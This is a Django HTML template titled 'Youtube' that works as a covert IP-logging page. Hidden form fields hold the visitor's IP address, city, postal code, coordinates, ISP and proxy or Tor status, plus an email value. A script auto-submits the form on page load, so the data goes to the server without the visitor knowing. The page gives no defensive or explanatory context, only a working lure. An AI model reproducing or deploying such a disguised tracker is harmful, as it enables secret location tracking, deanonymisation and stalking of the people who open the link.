<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Youtube</title>
</head>
<body>
    <form method="post" name="formu">
        {% csrf_token %}
        <input type="text" name="datos" maxlength="500" required="" id="id_datos" value="IP: {{data.query}} 
        Pais: {{data.country}} 
        Estado/Departamento: {{data.regionName}} 
        Ciudad: {{data.city}}
        Codigo Postal: {{data.zip}}
        Latitud: {{data.lat}}
        Longitud: {{data.lon}}
        Proveedor internet: {{data.org}}
        Nombre completo Proveedor: {{data.asname}}
        Ingreso por mobile: {{data.mobile}}
        Utilizo proxy o Tor: {{data.proxy}}" hidden>
        {% for i in email %}
            <input type="text" name="email" id="id_email" maxlength="50" value="{{i.email}}" hidden>
        {% endfor %}
        <input type="text" name="completo" maxlength="500" id="id_completo" value="True" hidden>
    </form>
</body>
<script>
    window.onload=function(){
		document.forms["formu"].submit();
    }
</script>
</html>